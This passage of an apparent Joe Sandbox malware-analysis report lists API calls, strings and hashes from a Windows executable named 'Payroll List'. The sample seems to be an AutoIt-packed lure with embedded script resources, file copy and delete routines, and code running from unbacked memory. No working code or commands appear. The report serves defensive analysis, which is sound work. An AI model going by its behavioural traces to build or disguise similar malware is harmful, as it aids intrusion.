                                                                    • API String ID: 3851250370-0
                                                                    • Opcode ID: 271afb62e84b9963411add1a003360f54af8728ce05669e64d84560c70b6be15
                                                                    • Instruction ID: 3e558a02b9abcfaa03a355f0120cca7e7c8b62064823e9bd9c6fcbb026998313
                                                                    • Opcode Fuzzy Hash: 271afb62e84b9963411add1a003360f54af8728ce05669e64d84560c70b6be15
                                                                    • Instruction Fuzzy Hash: B8618EB190A284DBCF15CF68A8C15E97FB4AF2A300F1989E9D8459F247C734CA49CB65

                                                                    Control-flow Graph
                                                                    • Entry block: 0012406B (graph image not reproduced here; the original figure marks basic blocks as Executed or Not Executed)
                                                                    • Internal calls: none; the function only calls the Windows APIs listed below
                                                                    APIs
                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0012449E,?,?,00000000,00000001), ref: 0012407B
                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0012449E,?,?,00000000,00000001), ref: 00124092
                                                                    • LoadResource.KERNEL32(?,00000000,?,?,0012449E,?,?,00000000,00000001,?,?,?,?,?,?,001241FB), ref: 00194F1A
                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,0012449E,?,?,00000000,00000001,?,?,?,?,?,?,001241FB), ref: 00194F2F
                                                                    • LockResource.KERNEL32(0012449E,?,?,0012449E,?,?,00000000,00000001,?,?,?,?,?,?,001241FB,00000000), ref: 00194F42
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                    • String ID: SCRIPT
                                                                    • API String ID: 3051347437-3967369404
                                                                    • Opcode ID: 3a2041656c2ab5c06e12f8f5875ec589567dbdd8410c949afeed2cf254bdea6f
                                                                    • Instruction ID: 4370c501e24768c15050224a7d2e765bf6db4a346949b9644283c0d48b560c50
                                                                    • Opcode Fuzzy Hash: 3a2041656c2ab5c06e12f8f5875ec589567dbdd8410c949afeed2cf254bdea6f
                                                                    • Instruction Fuzzy Hash: 4F115271200711BFE7218B65FC48FA77BB9EBCAB51F20416DF6029A660DB71DC80CA20
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00192F49), ref: 00166CB9
                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00166CCA
                                                                    • FindClose.KERNEL32(00000000), ref: 00166CDA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                    • String ID:
                                                                    • API String ID: 48322524-0
                                                                    • Opcode ID: 85a4ef843d79eb680c769464ccffc713dd188b8e6c561596648bb8921bb8972b
                                                                    • Instruction ID: bc0fb0409146c7648d5fddf049dc25e23cefefabb29e0251f992d03b43937b92
                                                                    • Opcode Fuzzy Hash: 85a4ef843d79eb680c769464ccffc713dd188b8e6c561596648bb8921bb8972b
                                                                    • Instruction Fuzzy Hash: 3DE04F31814D15ABC2246738FC0D8EA77ACEB1A339F104756F976C29E0EB70DD9486D6
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012E959
                                                                    • timeGetTime.WINMM ref: 0012EBFA
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012ED2E
                                                                    • TranslateMessage.USER32(?), ref: 0012ED3F
                                                                    • DispatchMessageW.USER32(?), ref: 0012ED4A
                                                                    • LockWindowUpdate.USER32(00000000), ref: 0012ED79
                                                                    • DestroyWindow.USER32 ref: 0012ED85
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0012ED9F
                                                                    • Sleep.KERNEL32(0000000A), ref: 00195270
                                                                    • TranslateMessage.USER32(?), ref: 001959F7
                                                                    • DispatchMessageW.USER32(?), ref: 00195A05
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00195A19
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                    • API String ID: 2641332412-570651680
                                                                    • Opcode ID: e398be256a80ee08c64542e5fee78302a89a67a111cd5f9c4e27ce359a3abe5d
                                                                    • Instruction ID: 0c9b4f4ec5023cf422a580fabad93793e80f442ad5c90388cd12ec446904acf7
                                                                    • Opcode Fuzzy Hash: e398be256a80ee08c64542e5fee78302a89a67a111cd5f9c4e27ce359a3abe5d
                                                                    • Instruction Fuzzy Hash: A062F370508350DFEB25DF64E885BAE77E5BF54304F08086DF98A9B292DB70D898CB52
                                                                    APIs
                                                                    • ___createFile.LIBCMT ref: 00155EC3
                                                                    • ___createFile.LIBCMT ref: 00155F04
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00155F2D
                                                                    • __dosmaperr.LIBCMT ref: 00155F34
                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00155F47
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00155F6A
                                                                    • __dosmaperr.LIBCMT ref: 00155F73
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00155F7C
                                                                    • __set_osfhnd.LIBCMT ref: 00155FAC
                                                                    • __lseeki64_nolock.LIBCMT ref: 00156016
                                                                    • __close_nolock.LIBCMT ref: 0015603C
                                                                    • __chsize_nolock.LIBCMT ref: 0015606C
                                                                    • __lseeki64_nolock.LIBCMT ref: 0015607E
                                                                    • __lseeki64_nolock.LIBCMT ref: 00156176
                                                                    • __lseeki64_nolock.LIBCMT ref: 0015618B
                                                                    • __close_nolock.LIBCMT ref: 001561EB
                                                                      • Part of subcall function 0014EA9C: CloseHandle.KERNELBASE(00000000,001CEEF4,00000000,?,00156041,001CEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0014EAEC
                                                                      • Part of subcall function 0014EA9C: GetLastError.KERNEL32(?,00156041,001CEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0014EAF6
                                                                      • Part of subcall function 0014EA9C: __free_osfhnd.LIBCMT ref: 0014EB03
                                                                      • Part of subcall function 0014EA9C: __dosmaperr.LIBCMT ref: 0014EB25
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    • __lseeki64_nolock.LIBCMT ref: 0015620D
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00156342
                                                                    • ___createFile.LIBCMT ref: 00156361
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0015636E
                                                                    • __dosmaperr.LIBCMT ref: 00156375
                                                                    • __free_osfhnd.LIBCMT ref: 00156395
                                                                    • __invoke_watson.LIBCMT ref: 001563C3
                                                                    • __wsopen_helper.LIBCMT ref: 001563DD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                    • String ID: @
                                                                    • API String ID: 3896587723-2766056989
                                                                    • Opcode ID: 47c36e7f680ca7145c5dc91b9261f5d2ce27efddfaf6dca7056ec84218d9e806
                                                                    • Instruction ID: c5cf0f00a03d9712ed695c5ae0ad8580110d7731cce8a5cce0a97716f0725054
                                                                    • Opcode Fuzzy Hash: 47c36e7f680ca7145c5dc91b9261f5d2ce27efddfaf6dca7056ec84218d9e806
                                                                    • Instruction Fuzzy Hash: 18222571900606DBEB299FA8CC957BD7B72EB10326F644229EC319F2E2C7358D48C791

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • _wcscpy.LIBCMT ref: 0016FA96
                                                                    • _wcschr.LIBCMT ref: 0016FAA4
                                                                    • _wcscpy.LIBCMT ref: 0016FABB
                                                                    • _wcscat.LIBCMT ref: 0016FACA
                                                                    • _wcscat.LIBCMT ref: 0016FAE8
                                                                    • _wcscpy.LIBCMT ref: 0016FB09
                                                                    • __wsplitpath.LIBCMT ref: 0016FBE6
                                                                    • _wcscpy.LIBCMT ref: 0016FC0B
                                                                    • _wcscpy.LIBCMT ref: 0016FC1D
                                                                    • _wcscpy.LIBCMT ref: 0016FC32
                                                                    • _wcscat.LIBCMT ref: 0016FC47
                                                                    • _wcscat.LIBCMT ref: 0016FC59
                                                                    • _wcscat.LIBCMT ref: 0016FC6E
                                                                      • Part of subcall function 0016BFA4: _wcscmp.LIBCMT ref: 0016C03E
                                                                      • Part of subcall function 0016BFA4: __wsplitpath.LIBCMT ref: 0016C083
                                                                      • Part of subcall function 0016BFA4: _wcscpy.LIBCMT ref: 0016C096
                                                                      • Part of subcall function 0016BFA4: _wcscat.LIBCMT ref: 0016C0A9
                                                                      • Part of subcall function 0016BFA4: __wsplitpath.LIBCMT ref: 0016C0CE
                                                                      • Part of subcall function 0016BFA4: _wcscat.LIBCMT ref: 0016C0E4
                                                                      • Part of subcall function 0016BFA4: _wcscat.LIBCMT ref: 0016C0F7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                                    • API String ID: 2955681530-2806939583
                                                                    • Opcode ID: 12ea58b3cfcb19be258c082545872f2dbea9a8f902e3910ab2a0f8b162081e0b
                                                                    • Instruction ID: c6c27ffcb0b3edd0bcff7d32746184bf1752f4d0149f17175c3bb448c0589f3f
                                                                    • Opcode Fuzzy Hash: 12ea58b3cfcb19be258c082545872f2dbea9a8f902e3910ab2a0f8b162081e0b
                                                                    • Instruction Fuzzy Hash: CD9194715043059FCB21EF54D891E9EB3E8BF68310F04486DF959972A1DB30FA69CB92

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0016BDB4: __time64.LIBCMT ref: 0016BDBE
                                                                      • Part of subcall function 00124517: _fseek.LIBCMT ref: 0012452F
                                                                    • __wsplitpath.LIBCMT ref: 0016C083
                                                                      • Part of subcall function 00141DFC: __wsplitpath_helper.LIBCMT ref: 00141E3C
                                                                    • _wcscpy.LIBCMT ref: 0016C096
                                                                    • _wcscat.LIBCMT ref: 0016C0A9
                                                                    • __wsplitpath.LIBCMT ref: 0016C0CE
                                                                    • _wcscat.LIBCMT ref: 0016C0E4
                                                                    • _wcscat.LIBCMT ref: 0016C0F7
                                                                    • _wcscmp.LIBCMT ref: 0016C03E
                                                                      • Part of subcall function 0016C56D: _wcscmp.LIBCMT ref: 0016C65D
                                                                      • Part of subcall function 0016C56D: _wcscmp.LIBCMT ref: 0016C670
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0016C2A1
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0016C338
                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0016C34E
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0016C35F
                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0016C371
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                    • String ID: p1Wu`KXu
                                                                    • API String ID: 2378138488-4063981602
                                                                    • Opcode ID: f1fda66b293bbc3544cd9848e880a46dbb489e062db96e8e10b67414ffd8697b
                                                                    • Instruction ID: 2ce31dbbb22a38a720402930dff1684ed6e837942170faf99f1e18eb05ebf001
                                                                    • Opcode Fuzzy Hash: f1fda66b293bbc3544cd9848e880a46dbb489e062db96e8e10b67414ffd8697b
                                                                    • Instruction Fuzzy Hash: C4C13EB1E00129AFDF21DF95DC81EEEB7BDAF59310F0040AAF649E6151DB309A948F61

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00123F86
                                                                    • RegisterClassExW.USER32(00000030), ref: 00123FB0
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00123FC1
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00123FDE
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00123FEE
                                                                    • LoadIconW.USER32(000000A9), ref: 00124004
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00124013
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: cf682c48ab1ccc25ea2f4c8b61e10c6761a44cdda298dc9d5967b48cb1079056
                                                                    • Instruction ID: 5894b0d835da675e176e0bb4788eb07525847d439a753908819dd7df59582f16
                                                                    • Opcode Fuzzy Hash: cf682c48ab1ccc25ea2f4c8b61e10c6761a44cdda298dc9d5967b48cb1079056
                                                                    • Instruction Fuzzy Hash: 9B21C7B5900358AFDB00DFE4E989BCDBBB4FB09704F00421AF615AAAA0D7B445848F91

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 001237B3
                                                                    • KillTimer.USER32(?,00000001), ref: 001237DD
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00123800
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0012380B
                                                                    • CreatePopupMenu.USER32 ref: 0012381F
                                                                    • PostQuitMessage.USER32(00000000), ref: 0012382E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                    • String ID: TaskbarCreated
                                                                    • API String ID: 129472671-2362178303
                                                                    • Opcode ID: 9e3c8af302f6f76d512ab1f625ae4ea230b09d2958dae463623b0a80f4ae5052
                                                                    • Instruction ID: 16db3f11d9615a75e9d30937470f20c01f5985ff4bfdab48b4718ef2b231accd
                                                                    • Opcode Fuzzy Hash: 9e3c8af302f6f76d512ab1f625ae4ea230b09d2958dae463623b0a80f4ae5052
                                                                    • Instruction Fuzzy Hash: FD415AF56006A6BBDF185FA8FD8AF7D3695F710300F000115F92296590CB789EF08761

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00123E79
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00123E88
                                                                    • LoadIconW.USER32(00000063), ref: 00123E9E
                                                                    • LoadIconW.USER32(000000A4), ref: 00123EB0
                                                                    • LoadIconW.USER32(000000A2), ref: 00123EC2
                                                                      • Part of subcall function 00124024: LoadImageW.USER32(00120000,00000063,00000001,00000010,00000010,00000000), ref: 00124048
                                                                    • RegisterClassExW.USER32(?), ref: 00123F30
                                                                      • Part of subcall function 00123F53: GetSysColorBrush.USER32(0000000F), ref: 00123F86
                                                                      • Part of subcall function 00123F53: RegisterClassExW.USER32(00000030), ref: 00123FB0
                                                                      • Part of subcall function 00123F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00123FC1
                                                                      • Part of subcall function 00123F53: InitCommonControlsEx.COMCTL32(?), ref: 00123FDE
                                                                      • Part of subcall function 00123F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00123FEE
                                                                      • Part of subcall function 00123F53: LoadIconW.USER32(000000A9), ref: 00124004
                                                                      • Part of subcall function 00123F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00124013
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                    • String ID: #$0$AutoIt v3
                                                                    • API String ID: 423443420-4155596026
                                                                    • Opcode ID: d9b0b0af173beb1d2a812e08c92b5cd1be60dfbe98218bcda998d24f78b43384
                                                                    • Instruction ID: 4291779038d4da14c7df9a8bab75969c468cd36106aa3fdf64e5aea496992d00
                                                                    • Opcode Fuzzy Hash: d9b0b0af173beb1d2a812e08c92b5cd1be60dfbe98218bcda998d24f78b43384
                                                                    • Instruction Fuzzy Hash: D5212AB0E00354BBCB04DFE9EC89A9DBBF5FB48314F00412AE215AA6A0D77546C48B91

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D57519
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D5773F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 204039940-0
                                                                    • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                    • Instruction ID: 49fedab1cbbf355eaa0d6162df286edce8817579864e06fdcdd6b1656455d740
                                                                    • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                    • Instruction Fuzzy Hash: ECA11574E04209EBDF14CFA4D898BEEBBB5BF48305F208159E905BB280D7759A44CFA4

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00124A1D
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001941DB
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0019421A
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00194249
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$CloseOpen
                                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                                    • API String ID: 1586453840-614718249
                                                                    • Opcode ID: b05798f4a1eb89f69082137b8f582d2bb01f539b473bddb5edff73dfa0af8c59
                                                                    • Instruction ID: 17d776b03b68136a0195180c7e22ba3038bd6930b25a849410a1099a4cf08844
                                                                    • Opcode Fuzzy Hash: b05798f4a1eb89f69082137b8f582d2bb01f539b473bddb5edff73dfa0af8c59
                                                                    • Instruction Fuzzy Hash: 1F113D75A00118BFEB04ABA4ED86DEF7BBCEF15744F000069F506D7191EB70AE529750

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001236E6
                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00123707
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,00123AA3,?), ref: 0012371B
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,00123AA3,?), ref: 00123724
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateShow
                                                                    • String ID: AutoIt v3$edit
                                                                    • API String ID: 1584632944-3779509399
                                                                    • Opcode ID: 11e1dd73250d01e3c4e9bf551df3aa832aa13216fb2686024631d0087be6951a
                                                                    • Instruction ID: 7e3341a5a117c603b04be545b561cacdff9901be2f219bfe0e995a7636a3cdfd
                                                                    • Opcode Fuzzy Hash: 11e1dd73250d01e3c4e9bf551df3aa832aa13216fb2686024631d0087be6951a
                                                                    • Instruction Fuzzy Hash: 92F0D0755402D07ADB319BA76C48E6B3E7DD7C7F24B00001AFA05A65A0D67108D5DA70

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00D57108: Sleep.KERNELBASE(000001F4), ref: 00D57119
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D57336
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileSleep
                                                                    • String ID: AV4EJ1JNFODER
                                                                    • API String ID: 2694422964-3771192685
                                                                    • Opcode ID: 2fb3aa39c0e9be9f02f6b3d9fdea35f98c480207dec4e5da2d47c4d876f6d762
